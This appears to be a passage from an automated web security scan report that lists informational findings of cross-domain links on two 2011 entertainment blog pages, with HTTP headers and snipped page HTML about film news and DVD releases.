<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110121213042_Cedar-Rapids.jpg" />There are lots of films to go through at this year's Sundance Film Festival, and many to be excited for, whether you're here or not. <br />
...[SNIP]...
<br />Check out all of their picks <a href="http://www.thewrap.com/movies/slideshow/sundance-2011-10-films-were-dying-see-slideshow-24046" title="http://www.thewrap.com/movies/slideshow/sundance-2011-10-films-were-dying-see-slideshow-24046">here</a>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.sunsetgun.com">Kim Morgan</a>
...[SNIP]...
<li class="first"><a href="http://www.slashfilm.com">/film</a></li><li><a href="http://blog.brightlightsfilm.com/">Bright Lights After Dark</a>
...[SNIP]...
<li><a href="http://chud.com/articles/">Chud</a></li><li><a href="http://www.cinematical.com">Cinematical</a>
...[SNIP]...
<li><a href="http://filmexperience.blogspot.com/">The Film Experience</a>
...[SNIP]...
<li><a href="http://finalgirl.blogspot.com">Final Girl</a></li><li><a href="http://daily.greencine.com">Green Cine</a></li><li><a href="http://www.hitfix.com">HitFix</a></li><li><a href="http://www.riskybusinessblog.com">Hollywood Reporter Risky Business Blog</a>
...[SNIP]...
<li><a href="http://thehousenextdooronline.com">The House Next Door</a>
...[SNIP]...
<li><a href="http://sunsetgun.typepad.com/sunsetgun/">Kim Morgan's Sunset Gun</a>
...[SNIP]...
<li><a href="http://www.moviecitynews.com/">Movie City News</a>
...[SNIP]...
<li><a href="http://www.avclub.com">Onion AV Club</a>
...[SNIP]...
<li><a href="http://theplaylist.blogspot.com">The Playlist</a>
...[SNIP]...
<li><a href="http://blogs.suntimes.com/scanners/">Scanners</a></li><li><a href="http://selfstyledsiren.blogspot.com">Self Styled Siren</a>
...[SNIP]...
<li><a href="http://sergioleoneifr.blogspot.com">Sergio Leone and Infield Fly Rule</a>
...[SNIP]...
<li><a href="http://www.sheilaomalle.com">The Sheila Variations</a>
...[SNIP]...
<li><a href="http://www.vanityfair.com/online/wolcott">Vanity Fair's James Wolcott</a>
...[SNIP]...
<li class="last"><a href="http://www.thewrap.com">The Wrap</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.297. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/movies/blogs/the-hitlist-blog.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx?feat=04db8167-2807-4c60-b794-b60b92d90ea8

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://blog.brightlightsfilm.com/
http://blogs.suntimes.com/scanners/
http://chud.com/articles/
http://daily.greencine.com/
http://download.live.com/?sku=messenger
http://filmexperience.blogspot.com/
http://finalgirl.blogspot.com/
http://insidemsn.wordpress.com/
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110121213042_Cedar-Rapids.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110124173707_Kevin-Smith.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110124174321_social_network_pga.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110126191944_deeper%20crop.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110127184824_jackson1-300x214.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128202305_rickygervais_wideweb__430x322.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128203805_PROTO-2-popup.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128211044_winters-bone.jpg
http://movies.nytimes.com/movie/334717/Bobby/overview
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://search.bing.com/results.aspx
http://search.bing.com/results.aspx?FORM=entertainment
http://selfstyledsiren.blogspot.com/
http://sergioleoneifr.blogspot.com/
http://sunsetgun.typepad.com/sunsetgun/
http://thehousenextdooronline.com/
http://theplaylist.blogspot.com/
http://topics.nytimes.com/top/reference/timestopics/people/k/robert_francis_kennedy/index.html?inline=nyt-per
http://www.avclub.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.cinematical.com/
http://www.delish.com/
http://www.hitfix.com/
http://www.huffingtonpost.com/2011/01/24/kevin-smith-rejects-hollywood-buys-red-state-rights_n_812866.html
http://www.moviecitynews.com/
http://www.nextmovie.com/blog/peter-jackson-hospitalized/
http://www.nytimes.com/2011/01/23/business/23proto.html?_r=1
http://www.riskybusinessblog.com/
http://www.sheilaomalle.com/
http://www.slashfilm.com/
http://www.stuff.co.nz/national/4589305/Sir-Peter-Jacksons-stomach-ulcer-scare
http://www.sunsetgun.com/
http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0
http://www.thewrap.com/
http://www.thewrap.com/awards/column-post/not-so-fast-weve-got-ourselves-oscar-race-24153
http://www.thewrap.com/movies/slideshow/sundance-2011-10-films-were-dying-see-slideshow-24046
http://www.vanityfair.com/online/wolcott
http://www.youtube.com/watch?v=tsafwBj4t1s&feature=player_embedded
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345051&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fthe-hitlist-blog.aspx%3Ffeat%3D04db8167-2807-4c60-b794-b60b92d90ea8&lc=1033&id=250710
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:51 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=70a16c71a55c4c61a3a1f7e96fd37f9b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=496C3F39553B4397A714AABA23E48508; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:51 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345051&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fthe-hitlist-blog.aspx%3Ffeat%3D04db8167-2807-4c60-b794-b60b92d90ea8&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128211044_winters-bone.jpg" />What if movie posters just cut to the chase? Damn the <i>
...[SNIP]...
</i> title -- this is what you really want, right? <a href="http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0" title="http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0">The Shiznit</a>
...[SNIP]...
<br />The <a href="http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0" title="http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0">Shiznit</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128203805_PROTO-2-popup.jpg" />My goodness. Finally! A genuinely sweet story involving alcohol and one of the Sheen clan.<br />
...[SNIP]...
<br />Here's the story from the<a href="http://www.nytimes.com/2011/01/23/business/23proto.html?_r=1" title="http://www.nytimes.com/2011/01/23/business/23proto.html?_r=1"> New York Times</a>
...[SNIP]...
<p>"The year was 2005, and Mr. Estevez was working on <a href="http://movies.nytimes.com/movie/334717/Bobby/overview" title="http://movies.nytimes.com/movie/334717/Bobby/overview">'Bobby,'</a> a film he wrote and directed, about the assassination of <a href="http://topics.nytimes.com/top/reference/timestopics/people/k/robert_francis_kennedy/index.html?inline=nyt-per" title="http://topics.nytimes.com/top/reference/timestopics/people/k/robert_francis_kennedy/index.html?inline=nyt-per">Robert F. Kennedy</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128202305_rickygervais_wideweb__430x322.jpg" />Whatever Ricky Gervais haters. When he's in the right element, he rules. <br />
...[SNIP]...
<br />Watch it <a href="http://www.youtube.com/watch?v=tsafwBj4t1s&feature=player_embedded" title="http://www.youtube.com/watch?v=tsafwBj4t1s&feature=player_embedded">here</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatright userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110127184824_jackson1-300x214.jpg" />"The Hobbit" has had so many setbacks, but this one, the director's health, is most troublesome. According to reports, he's in the clear, but we all hope for Peter Jackson's speedy
...[SNIP]...
<br />Here's more from <a href="http://www.nextmovie.com/blog/peter-jackson-hospitalized/" title="http://www.nextmovie.com/blog/peter-jackson-hospitalized/">Next Movie</a>
...[SNIP]...
<p>Yes, unfortunately, it’s true: according to the New Zealand website <a href="http://www.stuff.co.nz/national/4589305/Sir-Peter-Jacksons-stomach-ulcer-scare" title="http://www.stuff.co.nz/national/4589305/Sir-Peter-Jacksons-stomach-ulcer-scare">Stuff</a>
...[SNIP]...
<p><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110126191944_deeper%20crop.jpg" />With such wonderfully eclectic, innovative, moving, funny, disturbing and beautifully crafted shorts to choose from, Sundance jury duty was not an easy task.</p>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatleft userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110124174321_social_network_pga.jpg" />Will "The King's Speech" reign at the Oscars? And even, in spite of most Oscar oddsmakers, win Best Picture?<br />
...[SNIP]...
<br />Here's more from <a href="http://www.thewrap.com/awards/column-post/not-so-fast-weve-got-ourselves-oscar-race-24153" title="http://www.thewrap.com/awards/column-post/not-so-fast-weve-got-ourselves-oscar-race-24153">TheWrap</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatright userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110124173707_Kevin-Smith.jpg" />Kevin Smith doesn't need Hollywood. Or, he doesn't <i>
...[SNIP]...
<br />Here's <a href="http://www.huffingtonpost.com/2011/01/24/kevin-smith-rejects-hollywood-buys-red-state-rights_n_812866.html" title="http://www.huffingtonpost.com/2011/01/24/kevin-smith-rejects-hollywood-buys-red-state-rights_n_812866.html">more</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110121213042_Cedar-Rapids.jpg" />There are lots of films to go through at this year's Sundance Film Festival, and many to be excited for, whether you're here or not. <br />
...[SNIP]...
<br />Check out all of their picks <a href="http://www.thewrap.com/movies/slideshow/sundance-2011-10-films-were-dying-see-slideshow-24046" title="http://www.thewrap.com/movies/slideshow/sundance-2011-10-films-were-dying-see-slideshow-24046">here</a>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.sunsetgun.com">Kim Morgan</a>
...[SNIP]...
<li class="first"><a href="http://www.slashfilm.com">/film</a></li><li><a href="http://blog.brightlightsfilm.com/">Bright Lights After Dark</a>
...[SNIP]...
<li><a href="http://chud.com/articles/">Chud</a></li><li><a href="http://www.cinematical.com">Cinematical</a>
...[SNIP]...
<li><a href="http://filmexperience.blogspot.com/">The Film Experience</a>
...[SNIP]...
<li><a href="http://finalgirl.blogspot.com">Final Girl</a></li><li><a href="http://daily.greencine.com">Green Cine</a></li><li><a href="http://www.hitfix.com">HitFix</a></li><li><a href="http://www.riskybusinessblog.com">Hollywood Reporter Risky Business Blog</a>
...[SNIP]...
<li><a href="http://thehousenextdooronline.com">The House Next Door</a>
...[SNIP]...
<li><a href="http://sunsetgun.typepad.com/sunsetgun/">Kim Morgan's Sunset Gun</a>
...[SNIP]...
<li><a href="http://www.moviecitynews.com/">Movie City News</a>
...[SNIP]...
<li><a href="http://www.avclub.com">Onion AV Club</a>
...[SNIP]...
<li><a href="http://theplaylist.blogspot.com">The Playlist</a>
...[SNIP]...
<li><a href="http://blogs.suntimes.com/scanners/">Scanners</a></li><li><a href="http://selfstyledsiren.blogspot.com">Self Styled Siren</a>
...[SNIP]...
<li><a href="http://sergioleoneifr.blogspot.com">Sergio Leone and Infield Fly Rule</a>
...[SNIP]...
<li><a href="http://www.sheilaomalle.com">The Sheila Variations</a>
...[SNIP]...
<li><a href="http://www.vanityfair.com/online/wolcott">Vanity Fair's James Wolcott</a>
...[SNIP]...
<li class="last"><a href="http://www.thewrap.com">The Wrap</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.298. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/movies/blogs/videodrone-blog.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx?feat=aa535894-05e0-444f-9db6-fdb0cec6194f

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110124194929_nowhere-boy-jam.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110124211302_Renaldo_and_Clara.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110125034307_Tangled4Disc3D300.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110125034319_BambiDiamondEd300.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126000936_social-network-252x300.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126030122_127hrsDVD250.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126065439_dogtooth_200.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110127205129_GleeS2V1250.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110128030133_FridayNight_cover200.jpg
http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110128185659_You%20Only%20Live%20Once_02_300.jpg
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/
http://search.bing.com/results.aspx
http://search.bing.com/results.aspx?FORM=entertainment
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.criterion.com/current/posts
http://www.criterionforum.org/forum/index.php
http://www.davekehr.com/
http://www.delish.com/
http://www.dvdbeaver.com/
http://www.dvdreview.com/
http://www.dvdtalk.com/
http://www.dvdtalk.com/dvdsavant/index.html
http://www.filmforum.org/films/lang.html
http://www.highdefdigest.com/
http://www.hometheaterforum.com/
http://www.hometheaterforum.com/forum/list/117
http://www.litkicks.com/RenaldoAndClaraToBeFinallyReleased
http://www.movingimagesource.us/articles/the-other-fritz-lang-20110127
http://www.nitrateville.com/
http://www.nytimes.com/2011/01/23/movies/23dargis.html?_r=1
http://www.parallax-view.org/
http://www.seanax.com/
http://www.silentera.com/index.html
http://www.thedigitalbits.com/
http://www.thelmagazine.com/newyork/the-fury-fritz-lang-in-hollywood/Content?oid=1926813
http://www.tvshowsondvd.com/
http://www.varietysoundcheck.com/2011/01/the-return-of-renaldo-and-clara-it-aint-happening-babe.html
http://www.videowatchdog.blogspot.com/
http://www.villagevoice.com/2011-01-26/film/the-american-films-of-mad-genius-fritz-lang-expand-genres/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406663&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fvideodrone-blog.aspx%3Ffeat%3Daa535894-05e0-444f-9db6-fdb0cec6194f&lc=1033&id=250710
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /movies/blogs/videodrone-blog.aspx?feat=aa535894-05e0-444f-9db6-fdb0cec6194f HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=afd3cab45acc418383093f3b38fe3af9; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=66AC91F9F7EA4FC1AD239A8120CE3CC1; domain=.entertainment.msn.com; expires=Thu, 18-Aug-2011 16:57:43 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 61512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406663&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fvideodrone-blog.aspx%3Ffeat%3Daa535894-05e0-444f-9db6-fdb0cec6194f&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<br /><img alt="" class="imagefloatright userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126000936_social-network-252x300.jpg" />While many of the front-runners were released late in the year and are still playing in theaters -- best picture nominees "<a href="http://movies.redacted/movies/movie/black-
...[SNIP]...
<p>The Film Forum in New York begins the two-week retrospective "<a href="http://www.filmforum.org/films/lang.html" title="http://www.filmforum.org/films/lang.html">Fritz Lang  in Hollywood</a>
...[SNIP]...
surveys the German legend's work during his American exile: all 22 films he made in the United States between 1934 to 1956, in 35mm. It's the film event of the moment in New York (see <a href="http://www.nytimes.com/2011/01/23/movies/23dargis.html?_r=1" title="http://www.nytimes.com/2011/01/23/movies/23dargis.html?_r=1">Manohla Dargis in The New York Times</a>,  <a href="http://www.villagevoice.com/2011-01-26/film/the-american-films-of-mad-genius-fritz-lang-expand-genres/" title="http://www.villagevoice.com/2011-01-26/film/the-american-films-of-mad-genius-fritz-lang-expand-genres/">J. Hoberman in The Village Voice</a>, <a href="http://www.movingimagesource.us/articles/the-other-fritz-lang-20110127" title="http://www.movingimagesource.us/articles/the-other-fritz-lang-20110127">Cullen Gallagher at Moving Image Source</a>, <a href="http://www.thelmagazine.com/newyork/the-fury-fritz-lang-in-hollywood/Content?oid=1926813" title="http://www.thelmagazine.com/newyork/the-fury-fritz-lang-in-hollywood/Content?oid=1926813">Dan Callahan in The L</a>
...[SNIP]...
<p><img alt="" class="imagefloatright userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110128185659_You%20Only%20Live%20Once_02_300.jpg" />Those of us outside of the Big Apple may not be able to join the crowds for the glory of such classics (both major and minor) projected on the big screen, but Fritz Lang is a filmmaker well rep
...[SNIP]...
<div class="pst_exc more"><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110128030133_FridayNight_cover200.jpg" alt="" class="imagefloatright userImage lead" />Universal announces the release of the critical darling "<b>
...[SNIP]...
<p><img alt="" class="imagefloatleft userImage lead" src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110127205129_GleeS2V1250.jpg" />This run of episodes features the Britney episode (with Britney Spears herself making a cameo in the gas-induced hallucination musical numbers), "The Rocky Horror Glee Show" (direct
...[SNIP]...
<br /><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126065439_dogtooth_200.jpg" alt="" class="imagefloatright userImage lead" />More interesting (and far less commercial) is "<b>
...[SNIP]...
</blockquote><a href="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/" title="http://parallax-view.org/2011/01/25/chabrol-noe-and-more-dvds-of-the-week/"><br />
...[SNIP]...
<i><img src="http://media.social.s-redacted/images/blogs/00290065-0000-0000-0000-000000000000_f947180f-0c52-49d9-bd7c-649a2d83586a_20110126030122_127hrsDVD250.jpg" alt="" class="imagefloatleft userImage lead" /></i>
...[SNIP]...
